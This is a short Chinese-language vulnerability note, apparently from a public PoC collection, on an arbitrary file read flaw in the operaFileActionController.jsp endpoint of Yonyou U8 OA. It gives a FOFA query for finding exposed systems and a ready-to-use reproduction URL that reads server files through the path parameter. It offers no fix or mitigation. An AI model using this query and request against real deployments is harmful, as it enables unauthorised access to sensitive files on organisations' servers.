用友U8 OA operafileactioncontroller 存在任意文件读取漏洞
一、漏洞简介
用友U8+承载了用友人十余年来为成长型企业的信息化管理所倾注的心血,它以U8财务业务一体化、U8ERP、U8All-in-One、U8+形象伴随中国经济的高速发展一路走来,见证了成长型企业信息化从7个应用模块到126个产品及行业应用。用友U8 OA operafileactioncontroller 存在任意文件读取漏洞,攻击者可通过该漏洞获取敏感信息。
二、影响版本
- 用友U8 OA
三、资产测绘
- fofa
"用友U8-OA" - 特征
四、漏洞复现
/yyoa/portal/style/controller/operaFileActionController.jsp?path=/index.jsp&fileop=find